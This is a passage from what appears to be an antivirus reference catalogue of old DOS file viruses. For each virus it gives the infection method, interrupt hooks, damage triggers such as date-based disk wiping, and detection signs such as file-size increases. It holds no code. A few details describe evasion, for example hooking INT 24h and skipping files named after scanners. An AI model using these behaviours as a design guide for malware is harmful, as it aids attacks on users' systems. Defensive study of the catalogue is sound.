  13072.  
  13073. Note:
  13074. 1) It does not stay resident in the memory.
  13075. 2) An error message appears when writing because INT 24h has not been
  13076.    hanged.
  13077.  
  13078. [T-1000-B]
  13079. Virus Name: T-1000-B
  13080. Virus Type: File Virus (COM files)
  13081. Virus Length:
  13082.  
  13083. Execution Procedure:
  13084. The virus searches for all uninfected COM files on the current
  13085. directory, then infects them (only infects one file at a time).
  13086.  
  13087. Damage: It overwrites the original files with the virus code, thus
  13088. corrupting the files.
  13089.  
  13090. Note:
  13091. 1) It does not stay resident in the memory.
  13092. 2) An error message appears when writing because INT 24h has not been
  13093.    hanged.
  13094.  
  13095. [Soupy]
  13096. Virus Name: Soupy
  13097. Virus Type: FIle Virus (COM files)
  13098. Virus Length:  1072 bytes
  13099.  
  13100. Execution Procedure:
  13101. The virus searches for an uninfected COM file on the current directory,
  13102. then infects it (only infects one file at a time).
  13103.  
  13104. Damage: None
  13105.  
  13106. Note:
  13107. 1) It does not stay resident in the memory.
  13108. 2) An error message appears when writing because INT 24h has not been
  13109.    hanged.
  13110.  
  13111. Detection method: Infected files increase by 1072 bytes.
  13112.  
  13113. [Small-Exe]
  13114. Virus Name: Small-Exe
  13115. Virus Type: File Virus (EXE files)
  13116. Virus Length:  349 bytes
  13117.  
  13118. Execution Procedure:
  13119. The virus searches for an uninfected EXE file on the current directory,
  13120. then infects it (only infects one file at a time). After infection, the
  13121. virus halts the system.
  13122.  
  13123. Damage: The virus halts the system every time it infects a file.
  13124.  
  13125. Note:
  13126. 1) It does not stay resident in the memory.
  13127. 2) An error message appears when writing because INT 24h has not been
  13128.    hanged.
  13129.  
  13130. Detection method: Infected files increase by 349 bytes.
  13131.  
  13132. [Toys]
  13133. Virus Name: Toys
  13134. Virus Type: File Virus (COM and EXE files)
  13135. Virus Length:  773 bytes
  13136.  
  13137. Execution Procedure:
  13138. The virus searches for uninfected COM and EXE files on the current
  13139. directory, then infects them (infects two files at a time).
  13140.  
  13141. Damage: None
  13142.  
  13143. Note:
  13144. 1) It does not stay resident in the memory.
  13145. 2) An error message appears when writing because INT 24h has not been
  13146.    hanged.
  13147.  
  13148. Detection method: Infected files increase by 773 bytes.
  13149.  
  13150. [Leper]
  13151. Virus Name: Leper
  13152. Virus Type: File Virus (COM and EXE files)
  13153. Virus Length:
  13154.  
  13155. Execution Procedure:
  13156. The virus searches for uninfected COM and EXE files on the current
  13157. directory, then infects them (infects four files at a time).
  13158.  
  13159. Damage: It overwrites the original files with the virus code, thus
  13160. corrupting the files.
  13161.  
  13162. Note:
  13163. 1) It does not stay resident in the memory.
  13164. 2) An error message appears when writing because INT 24h has not been
  13165.    hanged.
  13166.  
  13167. [Arcv-7]
  13168. Virus Name: Arcv-7
  13169. Virus Type: File Virus (EXE files)
  13170. Virus Length:  541 bytes
  13171.  
  13172. Execution Procedure:
  13173. The virus searches for an uninfected EXE file on the current directory,
  13174. then infects it (only infects one file at a time).
  13175.  
  13176. Damage: None
  13177.  
  13178. Note:
  13179. 1) Because the virus infection program is not well written, the
  13180.    system will halt when an infected program is executed.
  13181. 2) It does not stay resident in the memory.
  13182. 3) An error message appears when writing because INT 24h has not been
  13183.    hanged.
  13184.  
  13185. Detection method: Infected files increase by 541 bytes.
  13186.  
  13187. [Arcv-6]
  13188. Virus Name: Arcv-6
  13189. Virus Type: File Virus (COM files)
  13190. Virus Length:  335 bytes
  13191.  
  13192. Execution Procedure:
  13193. The virus searches for an uninfected COM file on the current directory,
  13194. then infects it (only infects one file at a time).
  13195.  
  13196. Damage: None
  13197.  
  13198. Note:
  13199. 1) It does not stay resident in the memory.
  13200. 2) An error message appears when writing because INT 24h has not been
  13201.    hanged.
  13202.  
  13203. Detection method: Infected files increase by 335 bytes.
  13204.  
  13205. [Arcv-5]
  13206. Virus Name: Arcv-5
  13207. Virus Type: File Virus (COM files)
  13208. Virus Length:  475 bytes
  13209.  
  13210. Execution Procedure:
  13211. The virus searches for an uninfected COM file on the current directory,
  13212. then infects it (only infects one file at a time).
  13213.  
  13214. Damage: None
  13215.  
  13216. Note:
  13217. 1) It does not stay resident in the memory.
  13218. 2) An error message appears when writing because INT 24h has not been
  13219.    hanged.
  13220.  
  13221. Detection method: Infected files increase by 475 bytes.
  13222.  
  13223. [Exper-416]
  13224. Virus Name: Exper-416
  13225. Virus Type: File Virus (COM files)
  13226. Virus Length:  416 bytes
  13227.  
  13228. Execution Procedure:
  13229. The virus searches for all uninfected COM files on the current
  13230. directory, then infects them.
  13231.  
  13232. Damage: None
  13233.  
  13234. Note:
  13235. 1) It does not stay resident in the memory.
  13236. 2) An error message appears when writing because INT 24h has not been
  13237.    hanged.
  13238.  
  13239. Detection method: Infected files increase by 416 bytes.
  13240.  
  13241. [Ash-B]
  13242. Virus Name: Ash-B
  13243. Virus Type: File Virus (COM files)
  13244. Virus Length:  280 bytes
  13245.  
  13246. Execution Procedure:
  13247. The virus searches for all uninfected COM files on the current
  13248. directory, then infects them.
  13249.  
  13250. Damage: None
  13251.  
  13252. Note:
  13253. 1) It does not stay resident in the memory.
  13254. 2) An error message appears when writing because INT 24h has not been
  13255.    hanged.
  13256.  
  13257. Detection method: Infected files increase by 280 bytes.
  13258.  
  13259. [Scribble]
  13260. Virus Name: Scribble
  13261. Virus Type: File Virus (COM and EXE files)
  13262. Virus Length:
  13263.  
  13264. Execution Procedure:
  13265. The virus searches for all uninfected COM and EXE files on the
  13266. current directory, then infects them.
  13267.  
  13268. Damage: It overwrites the original files with the virus code, thus
  13269. corrupting the files.
  13270.  
  13271. Note:
  13272. 1) It does not stay resident in the memory.
  13273. 2) An error message appears when writing because INT 24h has not been
  13274.    hanged.
  13275.  
  13276. [Simple 1992]
  13277. Virus Name: Simple-1992
  13278. Virus Type: File Virus (COM files)
  13279. Virus Length:  424 bytes
  13280.  
  13281. Execution Procedure:
  13282. The virus searches for all uninfected COM files on the current
  13283. directory, then infects them. (Virus will also infect COMMAND.COM.)
  13284.  
  13285. Damage: None
  13286.  
  13287. Note:
  13288. 1) It does not stay resident in the memory.
  13289. 2) An error message appears when writing because INT 24h has not been
  13290.    hanged.
  13291.  
  13292. Detection method: Infected files increase by 424 bytes.
  13293.  
  13294. [Schrunch]
  13295. Virus Name: Schrunch
  13296. Virus Type: File Virus (COM files)
  13297. Virus Length:  420 bytes
  13298.  
  13299. Execution Procedure:
  13300. The virus displays the following message:
  13301.  
  13302.     "S C H R U N CH     E M     U P  T I M E."
  13303.  
  13304. The virus then searches for all uninfected COM files on the current
  13305. directory, then proceeds to infect them.
  13306.  
  13307. Damage: None
  13308.  
  13309. Note:
  13310. 1) It does not stay resident in the memory.
  13311. 2) An error message appears when writing because INT 24h has not been
  13312.    hanged.
  13313.  
  13314. Detection method:
  13315. 1) Infected files increase by 420 bytes.
  13316. 2) The virus displays the above message when an infected file is
  13317.    executed.
  13318.  
  13319. [CV4]
  13320. Virus Name: Cv4
  13321. Virus Type: File Virus (COM files)
  13322. Virus Length:  321 bytes
  13323.  
  13324. Execution Procedure:
  13325. The virus displays the following message:
  13326.  
  13327.     "This file infected with COMVIRUS 1.0."
  13328.  
  13329. The virus then searches for an uninfected COM file on the current
  13330. directory and proceeds to infect it (only infects one file at a
  13331. time).
  13332.  
  13333. Damage: None
  13334.  
  13335. Note:
  13336. 1) It does not stay resident in the memory.
  13337. 2) An error message appears when writing because INT 24h has not been
  13338.    hanged.
  13339.  
  13340. Detection method:
  13341. 1) Infected files increase by 321 bytes.
  13342. 2) The virus displays the above message when an infected file is
  13343.    executed.
  13344.  
  13345. [Arcv-3A]
  13346. Virus Name: Arcv-3a
  13347. Virus Type: File Virus (COM files)
  13348. Virus Length:  657 bytes
  13349.  
  13350. Execution Procedure:
  13351. 1) Searches for all uninfected COM files on the current directory,
  13352.    then infects them.
  13353. 2) Checks whether the current calendar month is February. If it is, the
  13354.    virus displays the following:
  13355.  
  13356.     "I've just Found a Virus.. Oops.. Sorry I'm the virus...Well
  13357.      let me introduce myself.. I am ARCV-3 Virus, by Apache
  13358.      Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote
  13359.      Yes to the Best Vote ARCV..."
  13360.  
  13361. Damage: None
  13362.  
  13363. Note:
  13364. 1) It does not stay resident in the memory.
  13365. 2) An error message appears when writing because INT 24h has not been
  13366.    hanged.
  13367.  
  13368. Detection method: Infected files increase by 657 bytes.
  13369.  
  13370. [Anti_Daf]
  13371. Virus Name: Anti_Daf
  13372. Virus Type: File Virus (COM files)
  13373. Virus Length:  561 bytes
  13374.  
  13375. Execution Procedure:
  13376. 1) Searches for an uninfected COM file on the current directory,
  13377.    then infects it (only infects one file at a time).
  13378. 2) Checks whether the current month is November, and the current day
  13379.    is Monday. If these conditions are met, the virus displays the
  13380.    message below, and then destroys all data on the hard disk.
  13381.  
  13382.     "The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan
  13383.      1..postbus 90063..6500 PREindhoven, The Netherlands.  .. DAF
  13384.      sucks..... (c) 1992 Dark Helmet & The Virus Research Centre"
  13385.  
  13386. Damage: The virus sometimes destroys all data on the hard disk.
  13387.  
  13388. Note:
  13389. 1) It does not stay resident in the memory.
  13390. 2) An error message appears when writing because INT 24h has not been
  13391.    hanged.
  13392.  
  13393. Detection method: Infected files increase by 561 bytes.
  13394.  
  13395. [Manola]
  13396. Virus Name: Manola
  13397. Virus Type: File Virus (COM files)
  13398. Virus Length:  831 bytes
  13399.  
  13400. Execution Procedure:
  13401. The virus checks whether the current day is 7. If it is, the virus
  13402. displays the following message and then reboots the system:
  13403.  
  13404.     "The Atomic Dustbin 2B - I'm Here To Stay".
  13405.  
  13406. If the above condition is not met, the virus searches for an
  13407. uninfected COM file on the current directory, then infects it (infects
  13408. only one file at a time).
  13409.  
  13410. Damage: The virus sometimes reboots the system.
  13411.  
  13412. Note:
  13413. 1) It does not stay resident in the memory.
  13414. 2) An error message appears when writing because INT 24h has not been
  13415.    hanged.
  13416.  
  13417. Detection method: Infected files increase by 831 bytes.
  13418.  
  13419. [Seneca-A]
  13420. Virus Name: Seneca-A
  13421. Virus Type: File Virus (EXE files)
  13422. Virus Length:
  13423.  
  13424. Execution Procedure:
  13425. 1) Searches for all uninfected EXE files on the current directory,
  13426.    then infects them.
  13427. 2) Checks whether the current date is November 25. If it is, the virus
  13428.    displays the following message and then destroys all data on the
  13429.    hard disk:
  13430.  
  13431.         "Its Seneca's B_DAY
  13432.          let's party   !!!"
  13433.  
  13434. Damage: The virus sometimes destroys all data on the hard disk.
  13435.  
  13436. Note:
  13437. 1) It does not stay resident in the memory.
  13438. 2) An error message appears when writing because INT 24h has not been
  13439.    hanged.
  13440.  
  13441. [Seneca-B]
  13442. Virus Name: SENECA-B
  13443. Virus Type: File Virus
  13444. Virus Length:
  13445.  
  13446. Execution Procedure:
  13447. 1) Searches for all (*.*) uninfected files on the current directory,
  13448.    then infects them.
  13449. 2) Checks whether the current date is November 25. If it is, the virus
  13450.    displays the following message and then destroys all data on the
  13451.    hard disk:
  13452.  
  13453.         "Its Seneca's B_DAY
  13454.          let's party   !!!"
  13455.  
  13456. Damage: The virus sometimes destroys all data on the hard disk.
  13457.  
  13458. Note:
  13459. 1) It does not stay resident in the memory.
  13460. 2) An error message appears when writing because INT 24h has not been
  13461.    hanged.
  13462.  
  13463. [Mog]
  13464. Virus Name: Mog
  13465. Virus Type: File Virus (COM files)
  13466. Virus Length:  328 bytes
  13467.  
  13468. Execution Procedure:
  13469. 1) The virus searches for all uninfected COM files on the current
  13470.    directory, then infects them. The virus then displays the
  13471.    following message:
  13472.  
  13473.        " Maccabi Yafo !!!!!"
  13474.  
  13475. 2) Checks whether the current date is February 25. If it is, the virus
  13476.    halts the system.
  13477.  
  13478. Damage: The virus sometimes halts the system.
  13479.  
  13480. Note:
  13481. 1) It does not stay resident in the memory.
  13482. 2) An error message appears when writing because INT 24h has not been
  13483.    hanged.
  13484.  
  13485. Detection method: Infected files increase by 328 bytes.
  13486.  
  13487. [LZ2]
  13488. Virus Name: Lz2
  13489. Virus Type: File Virus (EXE files)
  13490. Virus Length:  3000-8000 bytes
  13491.  
  13492. Execution Procedure:
  13493. The virus searches for an uninfected EXE file on the current directory,
  13494. then infects it (only infects one file at a time). The method of
  13495. infection is: it creates a new COM file with the same name as the
  13496. EXE file. This new COM file is the virus. Its length is 3000-8000 bytes.
  13497.  
  13498. Damage: None
  13499.  
  13500. Note:
  13501. 1) It does not stay resident in the memory.
  13502. 2) An error message appears when writing because INT 24h has not been
  13503.    hanged.
  13504. 3) The procedure at the beginning of the virus is encrypted in LZEXE
  13505.    mode. PCSCAN cannot scan this virus.
  13506.  
  13507. [Silver-3D]
  13508. Virus Name: Silver-3d
  13509. Virus Type: File Virus (COM and EXE files)
  13510. Virus Length:
  13511.  
  13512. Execution Procedure:
  13513. The virus searches for an uninfected COM or EXE file on the current
  13514. directory, then infects it (infects four files at a time).
  13515. The virus then displays the following message:
  13516.  
  13517.     "Program too big to fit in memory."
  13518.  
  13519. Damage:
  13520. 1) It overwrites the original files with the virus code, thus
  13521.    corrupting the files.
  13522. 2) If the virus cannot find an uninfected file, it will display "PLO
  13523.    VIRUS RESEARCH TEAM" in enlarged font. The virus then halts the
  13524.    system.
  13525.  
  13526. Detection method:
  13527. 1) The length of infected COM files is 8101 bytes.
  13528. 2) Executed infected files will display the following message:
  13529.  
  13530.    "Program too big to fit in memory" or
  13531.    "PLO VIRUS RESEARCH TEAM."
  13532.  
  13533. [Silly-Willy]
  13534. Virus Name: Silly-Willy
  13535. Virus Type: File Virus (COM and EXE files)
  13536. Virus Length:
  13537.  
  13538. Execution Procedure:
  13539. 1) When executing an infected COM program, it will infect files
  13540.    only when the current year is between 1988 and 1992.  When
  13541.    infecting files, the virus will search for an uninfected COM and
  13542.    EXE files on the current directory, then infects them. The virus
  13543.    will only infect one COM file and EXE file at a time.
  13544. 2) Executing an infected EXE program will not infect other files.
  13545.    At this time, a smiling face is displayed on the screen
  13546.    Furthermore, when any key is depressed, the following message
  13547.    will be displayed:
  13548.  
  13549.    "Hello ! I'm Silly-Willy
  13550.     Now, I'm formatting your HARDDISK.........."
  13551.  
  13552.    (It does not really format the hard disk). If there is a diskette
  13553.    in drive A, all data on this diskette will be destroyed and the
  13554.    virus will proceed to hang the system.
  13555.  
  13556. Damage: The virus sometimes destroys all data on the diskette in
  13557. drive A and halts the system.
  13558.  
  13559. [Stupid 1]
  13560. Virus Name: Stupid 1, July 4
  13561. Virus Type: File Virus (COM files)
  13562. Virus Length:  743 bytes
  13563.  
  13564. Execution Procedure:
  13565. 1) If the word at address 0000:01FEh is FFFFh, the virus will not
  13566.    infect any file.
  13567. 2) When the virus infects files, it will infect all uninfected COM
  13568.    files on the current directory. If the number of infection is less
  13569.    than 2, it will go on infecting all COM files on the upper
  13570.    directory until the number is larger than 2 or it has reached
  13571.    the root directory. It will check whether the current date is July 4
  13572.    and current time is 0:00am, 1:00am, 2:00am, 3:00am, 4:00am, or
  13573.    5:00am. If these conditions are met, the virus will proceed to
  13574.    destroy data on the current diskette.
  13575.  
  13576. Detection method:
  13577. 1) Date and time fields of infected files are changed.
  13578. 2) Byte at 0003h of an infected COM file is 1Ah.
  13579. 3) Infected COM file displays the following message:
  13580.  
  13581.          "Abort, Retry, Ignore, Fail?" ,
  13582.          "Fail on INT 24"
  13583.    (2) - "Impotence error reading users disk"
  13584.    (0) - "Program too big to fit in memory"
  13585.    (1) - "Cannot load COMMAND, system halted"
  13586.    (3)"Joker!" and "*.com."
  13587.  
  13588. 4) The virus displays the above message when executing an
  13589.    infected file.
  13590.  
  13591. [Klf-356]
  13592. Virus Name: Klf-356
  13593. Virus Type: File Virus (COM files)
  13594. Virus Length:  356 bytes
  13595.  
  13596. PC Vectors Hooked: INT 21h, INT 24h
  13597.  
  13598. Execution Procedure:
  13599. 1) Checks whether it is memory resident. If not, it loads itself
  13600.    resident in the high memory.
  13601. 2) Hooks INT 21h and goes back to the original routine.
  13602.  
  13603. Infection Procedure:
  13604. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13605.    prevent divulging its trace when writing. If the program to be
  13606.    executed is an uninfected COM file, the virus proceeds to infect it.
  13607.  
  13608. Damage: None
  13609.  
  13610. Detection method: Infected files increase by 356 bytes.
  13611.  
  13612. [April 998]
  13613. Virus Name: April 998
  13614. Virus Type: File Virus
  13615.             Virus infects .EXE files which are greater than 10h.
  13616.             Virus is a memory resident.
  13617. Virus Length: 998 bytes (file), 1104 bytes (memory)
  13618.  
  13619. PC Vectors Hooked: INT 21h
  13620.  
  13621. Infection Process: This virus is spread by executing an infected
  13622. program. When an April, 1998 infected program is executed, it will
  13623. check to see if it already resident in the memory. If so, it will
  13624. execute the infected program. The virus stays resident at the top of
  13625. the MCB (memory control block) but below the DOS 640k boundary.
  13626.  
  13627. Damage: Virus writes garbage to the C drive from relative sector 0 to
  13628. sector Feh when the system date is April of any year.
  13629.  
  13630. Symptoms:  The available free memory will decrease by 1104 bytes.
  13631.  
  13632. Note: This virus doesn't infect files named: "SCAN*", "CLEA*",
  13633. "VIRS*","F-PR*" OR "CPAV*"
  13634.  
  13635. [17-768]
  13636. Virus Name:  17-768
  13637. Virus Type: File Virus
  13638.             Virus infects .COM and .EXE files shorter than 59920
  13639.             bytes. Memory resident.
  13640. Virus Length: 768 (300h) bytes (file), 800 (320h) bytes (memory)
  13641.  
  13642. PC Vectors Hooked: INT 09h, INT 21h
  13643.  
  13644. Infection Process: This virus is a variant of the November-17th
  13645. virus: If the system date is equal to 17 November, and the value
  13646. of [40:46E] is not the same as the virus backup value of [40:46E]
  13647. when the virus is resident, it will destroy the current disk beginning
  13648. from sector 1 to sector 8. The first time a program infected
  13649. with November 17th is executed, the virus will install itself
  13650. memory resident at the top of the system memory but below the 640K
  13651. DOS boundary.
  13652.  
  13653. Damage: Virus destroys the current disk from sector 1 to sector 8. By
  13654. progressive action, the virus will insert garbage in these sectors
  13655. when the date is the 17th of November.
  13656.  
  13657. Symptoms:  File size increase of 855 bytes. Available free memory
  13658. decreases by 896 bytes.
  13659.  
  13660. Note: The November 17th virus was detected in January, 1992.  Its
  13661. origin or point of original isolation was originally unknown, but
  13662. it has since been reported as being widespread in Rome, Italy in
  13663. December, 1991. November 17th is a memory resident infector of
  13664. .COM and .EXE programs, including COMMAND.COM.
  13665.  
  13666. [Jeff]
  13667. Virus Name: Jeff
  13668. Virus Type: File Virus (COM files)
  13669. Virus Length:  815-820 bytes
  13670.  
  13671. Execution Procedure:
  13672. The virus searches for an uninfected COM file on the current directory,
  13673. then infects it. It only infects one file at a time.
  13674.  
  13675. Damage: None
  13676.  
  13677. Note:
  13678. 1) It does not stay resident in the memory.
  13679. 2) An error message appears when writing because INT 24h has not been
  13680.    hanged.
  13681.  
  13682. Detection method: Infected files increase by 815-820 bytes.
  13683.  
  13684. [Ill]
  13685. Virus Name: Ill
  13686. Virus Type: File Virus (COM files)
  13687. Virus Length:  1016 bytes
  13688.  
  13689. Execution Procedure:
  13690. The virus searches for an uninfected COM file on the current directory,
  13691. then infects it. It only infects one file at a time.
  13692.  
  13693. Damage: None
  13694.  
  13695. Note:
  13696. 1) It does not stay resident in the memory.
  13697. 2) An error message appears when writing because INT 24h has not been
  13698.    hanged.
  13699.  
  13700. Detection method: Infected files increase by 1016 bytes.
  13701.  
  13702. [Iero-512-560]
  13703. Virus Name: Iero-512-560
  13704. Virus Type: File Virus (COM files)
  13705. Virus Length:  512 or 560 bytes
  13706.  
  13707. PC Vectors Hooked: INT 21h, INT 08h
  13708.  
  13709. Execution Procedure:
  13710. 1) Checks whether it is memory resident. If not, it loads itself
  13711.    resident in the high memory.
  13712. 2) Hooks INT 21h and goes back to the original routine.
  13713.  
  13714. Infection Procedure:
  13715. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13716.    is an uninfected COM file, the virus proceeds to infect it.
  13717. 2) Hooks INT 08h to check the current time. At some random point in
  13718.    time, it will display the following message:
  13719.  
  13720.     "Mulier pulchr aest janua diab oli , .. via iniq uitatis,
  13721.     scorpion is percussio. .St. Ieronim.."
  13722.  
  13723. Damage: None
  13724.  
  13725. Note:
  13726. 1) An error message appears when writing because INT 24h has not been
  13727.    hanged.
  13728. 2) While the virus is memory resident, the available memory decreases
  13729.    by 1. You can check this by using MEM.EXE.
  13730.  
  13731. Detection method: Infected files increase by 512 or 560 bytes.
  13732.  
  13733. [Iernim]
  13734. Virus Name: Iernim
  13735. Virus Type: File Virus (COM files)
  13736. Virus Length:  570 or 600 bytes
  13737.  
  13738. PC Vectors Hooked: INT 21h, INT 08h
  13739.  
  13740. Execution Procedure:
  13741. 1) Checks whether it is memory resident. If not, it loads itself
  13742.    resident in the high memory.
  13743. 2) Hooks INT 21h and goes back to the original routine.
  13744.  
  13745. Infection Procedure:
  13746. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13747.    is an uninfected COM file, the virus proceeds to infect it.
  13748. 2) Hooks INT 08h to check the current time. At some random point in
  13749.    time, it will display the following message:
  13750.  
  13751.     "Mulier pulchra est janua diaboli , .. via iniquitatis,
  13752.     scorpionis percussio ..St. Ieronim.."
  13753.  
  13754. Damage: None
  13755.  
  13756. Note:
  13757. 1) An error message appears when writing because INT 24h has not been
  13758.    hanged.
  13759. 2) While the virus is memory resident, the available memory decreases
  13760.    by 1. You can check this by using MEM.EXE.
  13761.  
  13762. Detection method: Infected files increase by 570 or 600 bytes.
  13763.  
  13764. [Horror]
  13765. Virus Name: Horror
  13766. Virus Type: File Virus (COM and EXE files)
  13767. Virus Length:  1112-1182 bytes
  13768.  
  13769. PC Vectors Hooked: INT 21h, INT 24h
  13770.  
  13771. Execution Procedure:
  13772. 1) Checks whether it is memory resident. If not, it loads itself
  13773.    resident in the high memory.
  13774. 2) Hooks INT 21h.
  13775. 3) Checks whether COMMAND.COM that booted up the system is infected
  13776.    or not. If not, the virus infects it and goes back to original
  13777.    routine.
  13778.  
  13779. Infection Procedure:
  13780. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13781.    prevent divulging its trace when writing. If the program to be
  13782.    executed is an uninfected COM or EXE file, the virus proceeds to
  13783.    infect it.
  13784.  
  13785. Damage: It destroys all data on the hard disk (Every variant of
  13786. the virus has its own infection time).
  13787.  
  13788. Note: The Soft-mice software is destroyed by infected EXE programs.
  13789.  
  13790. Detection method: Infected files increase by 1112-1182 bytes.
  13791.  
  13792. [I-B]
  13793. Virus Name: I-B
  13794. Virus Type: File Virus (COM files)
  13795. Virus Length:
  13796.  
  13797. Execution Procedure:
  13798. The virus searches for all uninfected COM files on all directories,
  13799. and infects them. No matter whether it has infected a file or not,
  13800. this virus will check whether the current day is Monday. If it is,
  13801. the virus proceeds to destroy all data on the hard disk.
  13802.  
  13803. Damage:
  13804. 1) It sometimes destroys all data on the hard disk.
  13805. 2) It overwrites the original files with the virus code, thus
  13806.    corrupting the files.
  13807.  
  13808. Note:
  13809. 1) It does not stay resident in the memory.
  13810. 2) An error message appears when writing because INT 24h has not been
  13811.    hanged.
  13812.  
  13813. [Cr-2480b]
  13814. Virus Name: Cr-2480b
  13815. Virus Type: File Virus (COM files)
  13816. Virus Length:  2480 bytes
  13817.  
  13818. Execution Procedure:
  13819. The virus searches for an uninfected COM file on the current directory,
  13820. then infects it (It only infects one file at a time).
  13821.  
  13822. Damage: None
  13823.  
  13824. Note:
  13825. 1) It does not stay resident in the memory.
  13826. 2) An error message appears when writing because INT 24h has not been
  13827.    hanged.
  13828.  
  13829. Detection method: Infected files increase by 2480 bytes.
  13830.  
  13831. [Md-354]
  13832. Virus Name: Md-354
  13833. Virus Type: File Virus (COM files)
  13834. Virus Length:  354 bytes
  13835.  
  13836. Execution Procedure:
  13837. The virus searches for an uninfected COM file on the current directory,
  13838. then infects it (It only infects one file at a time).
  13839.  
  13840. Damage: None
  13841.  
  13842. Note:
  13843. 1) It does not stay resident in the memory.
  13844. 2) An error message appears when writing because INT 24h has not been
  13845.    hanged.
  13846.  
  13847. Detection method: Infected files increase by 354 bytes.
  13848.  
  13849. [Los-693]
  13850. Virus Name: Los-693
  13851. Virus Type: File Virus (COM files)
  13852. Virus Length: 693 bytes
  13853.  
  13854. PC Vectors Hooked: INT 21h, INT 24h
  13855.  
  13856. Execution Procedure:
  13857. 1) Checks whether it is memory resident. If not, it loads itself
  13858.    resident in the high memory.
  13859. 2) Hooks INT 21h and goes back to the original routine.
  13860.  
  13861. Infection Procedure:
  13862. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  13863.    prevent divulging its trace when writing. If the program to be
  13864.    executed is an uninfected COM file, the virus proceeds to infect it.
  13865.  
  13866. Damage:
  13867. There is a virus flag in the partition (initial value is zero).
  13868. The value will increase by 1 every time the virus infects a file. When
  13869. this flag is larger than 223, the virus hooks INT 08h. One minute later,
  13870. characters will start to fall down on the screen. The virus then halts
  13871. the system.
  13872.  
  13873. Detection method: Infected files increase by 693 bytes.
  13874.  
  13875. [Bung1422]
  13876. Virus Name: Bung1422
  13877. Virus Type: File Virus (COM files)
  13878. Virus Length: 1442 bytes
  13879.  
  13880. PC Vectors Hooked: INT 21h, INT 24h
  13881.  
  13882. Execution Procedure:
  13883. 1) Checks whether it is memory resident. If not, it loads itself
  13884.    resident in the high memory.
  13885. 2) Hooks INT 21h and goes back to the original routine.
  13886. 3) Checks whether the current date is September 20. If it is, the virus
  13887.    displays the following message:
  13888.  
  13889.     "Jonhan Bonhn  - September 20 1980
  13890.     -  L E D  Z E P P E L I N  -"
  13891.  
  13892. Infection Procedure:
  13893. 1) Hooks INT 21H(AH=4Bh). First, it hangs INT 24h to prevent divulging
  13894.    its trace when writing. If the program to be executed is an
  13895.    uninfected COM file, the virus infects it directly. If the program
  13896.    to be executed is an EXE file, it will search for an uninfected COM
  13897.    file and infect it. Lastly, the virus restores INT 24h.
  13898.  
  13899. Damage: None
  13900.  
  13901. Detection method: Infected files increase by 1422 bytes.
  13902.  
  13903. [Src-377]
  13904. Virus Name: Src-377
  13905. Virus Type: File Virus (COM files)
  13906. Virus Length: 377 bytes
  13907.  
  13908. Execution Procedure:
  13909. The virus searches for all uninfected COM files on all directories,
  13910. and proceeds to infect them.
  13911.  
  13912. Damage:
  13913. If the hard disk is divided into more than one partition, and the
  13914. system is booted up from the second partition (D drive), all data on
  13915. this drive will be corrupted.
  13916.  
  13917. Note:
  13918. 1) It does not stay resident in the memory.
  13919. 2) An error message appears when writing because INT 24h has not been
  13920.    hanged.
  13921.  
  13922. Detection method: Infected files increase by 377 bytes.
  13923.  
  13924. [Mini-195]
  13925. Virus Name: Mini-195
  13926. Virus Type: File Virus (COM files)
  13927. Virus Length: 195 or 218 bytes
  13928.  
  13929. Execution Procedure:
  13930. The virus searches for an uninfected #*.COM file ("#" indicates a
  13931. character from 'A' to 'Z', like A*.com, F*.COM, X*.COM) on the
  13932. current directory, and infects it.
  13933.  
  13934. Damage: None
  13935.  
  13936. Note:
  13937. 1) It does not stay resident in the memory.
  13938. 2) An error message appears when writing because INT 24h has not been
  13939.    hanged.
  13940.  
  13941. Detection method: Infected files increase by 195 or 218 bytes.
  13942.  
  13943. [Gold]
  13944. Virus Name: Gold
  13945. Virus Type: File Virus (COM and EXE files)
  13946. Virus Length:  612 bytes
  13947.  
  13948. PC Vectors Hooked: INT 21h
  13949.  
  13950. Execution Procedure:
  13951. 1) Checks whether it is memory resident. If not, it loads itself
  13952.    resident in the high memory.
  13953. 2) Hooks INT 21h and goes back to the original routine.
  13954.  
  13955. Infection Procedure:
  13956. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13957.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  13958.    After it has infected the file, the virus has a 50% chance of going
  13959.    back to the original routine. The other possibility is for the virus
  13960.    to display random characters and end without executing the original
  13961.    routine.
  13962.  
  13963. Damage: None
  13964.  
  13965. Note: An error message appears when writing because INT 24h has not
  13966. been hanged.
  13967.  
  13968. Detection method: Infected files increase by 612 bytes.
  13969.  
  13970. [Hard-Day]
  13971. Virus Name: Hard-Day
  13972. Virus Type: File Virus (COM files)
  13973. Virus Length:  662 bytes
  13974.  
  13975. PC Vectors Hooked: INT 21h
  13976.  
  13977. Execution Procedure:
  13978. 1) Checks whether it is memory resident. If not, it loads itself
  13979.    resident in the high memory.
  13980. 2) Hooks INT 21h and goes back to the original routine.
  13981.  
  13982. Infection Procedure:
  13983. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13984.    is an uninfected COM file, the virus proceeds to infect it.
  13985.  
  13986. Damage:
  13987. If the current calendar day is Monday and current time is 18:00 later,
  13988. the virus halts the system after displaying the following message:
  13989.  
  13990.     "Hard day's night !"
  13991.  
  13992. Note: An error message appears when writing because INT 24h has not
  13993. been hanged.
  13994.  
  13995. Detection method: Infected files increase by 662 bytes.
  13996.  
  13997. [In83-584]
  13998. Virus Name: In83-584
  13999. Virus Type: File Virus (COM files)
  14000. Virus Length: 584 bytes
  14001.  
  14002. PC Vectors Hooked: INT 21h, INT 24h
  14003.  
  14004. Execution Procedure:
  14005. 1) Checks whether it is memory resident. If not, it loads itself
  14006.    resident in the high memory.
  14007. 2) Hooks INT 21h and goes back to the original routine.
  14008.  
  14009. Infection Procedure:
  14010. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14011.    prevent divulging its trace when writing. If the program to be
  14012.    executed is an uninfected COM file, the virus proceeds to infect it.
  14013.  
  14014. Damage: None
  14015.  
  14016. Detection method: Infected files increase by 584 bytes.
  14017.  
  14018. [Tankard]
  14019. Virus Name: Tankard
  14020. Virus Type: File Virus (COM files)
  14021. Virus Length: 493 bytes
